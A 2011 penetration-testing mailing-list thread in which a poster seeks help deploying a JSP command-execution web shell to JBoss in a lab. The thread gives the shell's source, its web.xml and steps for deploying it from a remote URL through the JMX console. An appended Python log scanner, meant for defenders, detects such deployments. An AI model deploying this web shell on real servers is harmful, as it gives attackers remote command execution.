Penetration Testing mailing list archives

Re: breaking jboss with a browser? not happening


From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:11:20 -0800 (PST)


Yes, I know about the different upload features of JBoss and I'm currently
exploiting the use of deployment scanners. Thank you for your help.



Danux wrote:

Hint: check the upload features of Jboss. You can upload war files.
Sent via BlackBerry from Danux Network

-----Original Message-----
From: lazers <a.alii85 () gmail com>
Sender: listbounce () securityfocus com
Date: Fri, 14 Jan 2011 12:02:57 
To: <pen-test () securityfocus com>
Subject: breaking jboss with a browser? not happening


I have been given a task to break into a JBoss application by my senior sec
manager at my company. It's a hacking challenge staged in a test lab. This is
what I have been given:

A web-access to JBoss.

Yes, that's pretty much it <3. He believes in the "less is more" philosophy,
with some get-to-start-working info. I have been told that a vulnerability
exists in the application and it's no 0-day exploit, it's a known
vulnerability. It is set as an open-book challenge; I can get help anywhere I
like. So what did I do so far?

Yes, I googled; but I also ran a Nessus scan and the scan brought me one HIGH
vulnerability. It has to do with the default JBoss installation using the
JMX-Console. It's not a new vulnerability; I was able to reach this conclusion
as I started googling. This particular vulnerability is very popular; I was
saying to myself that my problems are over and I would break into JBoss in
record time. But that has been largely untrue. Why? Well, if it wasn't true I
wouldn't be here. I did the following (in steps):

attack vector: deployment scanner feature

1. Confirmed the default installation (by accessing localhost:9090); in my
case it's 9090, not 8080 as in hacking literature. Probably this is because
I'm using a new version (idk exact reason).

2. I wrote this JSP script (cmd.jsp) as told in sites.

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>

 

3. Next I created a web.xml file to be placed in the WEB-INF folder:

<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
                             http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>


4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF
folder:

jar cvf cmd.war WEB-INF cmd.jsp

5. I put this file on an Apache HTTP server. The file cmd.war resides in the
htdocs folder and can be accessed by URL: mywebserver:80/cmd.war

6. I went back to the JBoss default page and navigated to the
jboss.deployment page.

7. In the addURL tab I entered the path for my cmd.war file as
http://mywebserver/cmd.war

8. Next I went to the victim web server in an attempt to access my uploaded
application: http://victim:9090/cmd/cmd.jsp

9. I get HTTP STATUS 404 - /cmd/cmd.jsp

My app is supposed to be hot deployed by JBoss, but this is not the case,
because even after 10-20 times after you have accessed the file I get the same
error page. I want to know what the reason for this behavior is. I know there
exist other attack vectors (e.g. RMI etc.) but I want to stick to this until I
figure out the reason for this failure of the exploit.

Am I compiling the .jsp file with incorrect syntax? Do I need to have a Tomcat
server installed instead? I read on the internet that there could be some
problems in JBoss trying to get a reverse shell on your web server, as JBoss
works in bind-shell mode only? I'm really clueless as to what is happening; I
spent 12 works on this single attack vector but I'm not making headway.

JBoss gurus, help me.

thanks
-- 
View this message in context:
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html
Sent from the Penetration Testing mailing list archive at Nabble.com.


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review
Board

Prove to peers and potential employers without a doubt that you can
actually do a proper penetration test. IACRB CPT and CEPT certs require a
full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------




-- 
View this message in context: 
http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726534.html
Sent from the Penetration Testing mailing list archive at Nabble.com.
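From the defender's side, the deployment path discussed in this thread (pointing the JMX console's deployment scanner at a remote .war URL) leaves a distinctive trace in the web server's access log: a request to /jmx-console/HtmlAdaptor that invokes an operation on a deployer MBean with a URL argument. The script below is an added example and is not code from the thread or from JBoss; it parses combined-format access log lines, rates requests to JBoss management endpoints, and flags deployer invocations carrying a remote URL as high severity. The log lines are constructed for the example, and the HtmlAdaptor parameter names it inspects (action, name, arg0) are assumed from the console's request format rather than taken from the thread.

```python
"""Flag JBoss JMX-console deployment activity in HTTP access logs (added example)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jan/2011:12:02:57 +0000] "GET /jmx-console/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jan/2011:12:03:10 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL HTTP/1.1" 200 8891 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jan/2011:12:03:40 +0000] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jan/2011:12:03:41 +0000] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment:type=DeploymentScanner,flavor=URL&arg0=http://mywebserver/cmd.war HTTP/1.1" 200 1201 "-" "Mozilla/5.0"
10.0.0.5 - - [14/Jan/2011:12:04:02 +0000] "GET /cmd/cmd.jsp?cmd=id HTTP/1.1" 404 951 "-" "Mozilla/5.0"
192.168.1.20 - - [14/Jan/2011:12:05:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Combined log format: client, identd, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# JBoss management surfaces that should normally only be reached by administrators.
MANAGEMENT_PATHS = ("/jmx-console", "/web-console", "/invoker")
# MBean names that can pull in or deploy an application (assumed naming).
DEPLOYER_MBEAN_HINTS = ("DeploymentScanner", "MainDeployer")
# A remote location passed as an operation argument is what a .war-by-URL deploy looks like.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "file:")


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    entry["query"] = parse_qs(parts.query)   # values are lists
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return (severity, reason) for a management-endpoint request, else None."""
    path, query, method = entry["path"], entry["query"], entry["method"]
    if not path.startswith(MANAGEMENT_PATHS):
        return None
    if path.startswith("/jmx-console/HtmlAdaptor"):
        action = query.get("action", [""])[0]
        mbean = query.get("name", [""])[0]
        if action.startswith("invokeOp"):
            # Operation arguments arrive as arg0, arg1, ...; a remote URL handed
            # to a deployer MBean is the signature of a remote .war deployment.
            urls = [v for k, vals in query.items() if k.startswith("arg")
                    for v in vals if v.lower().startswith(REMOTE_SCHEMES)]
            if urls or any(h in mbean for h in DEPLOYER_MBEAN_HINTS):
                arg = urls[0] if urls else "(no URL argument)"
                return ("high", f"deployer operation invoked on {mbean or '?'} with {arg}")
            return ("medium", f"MBean operation invoked via JMX console on {mbean or '?'}")
        if method == "POST":
            # Form-submitted invocations carry their parameters in the body,
            # which the access log does not record; treat them as suspicious.
            return ("medium", "JMX console operation submitted via POST (parameters not logged)")
    return ("low", f"management endpoint accessed: {path}")


def scan(log_text):
    """Run every line through the classifier and collect the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is None:
            continue
        severity, reason = verdict
        findings.append({"ip": entry["ip"], "ts": entry["ts"],
                         "severity": severity, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity'].upper():6} {f['ip']:14} {f['ts']}  {f['reason']}")
```

On the constructed sample the script reports the two console page loads as low, the POST form submission as medium, and the invokeOp request carrying http://mywebserver/cmd.war as high; ordinary application traffic produces no finding. Because POST parameters never reach the access log, a real deployment should additionally correlate the console request with the outbound fetch of the .war on the proxy or firewall, and with the appearance of a new context in the JBoss server log.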

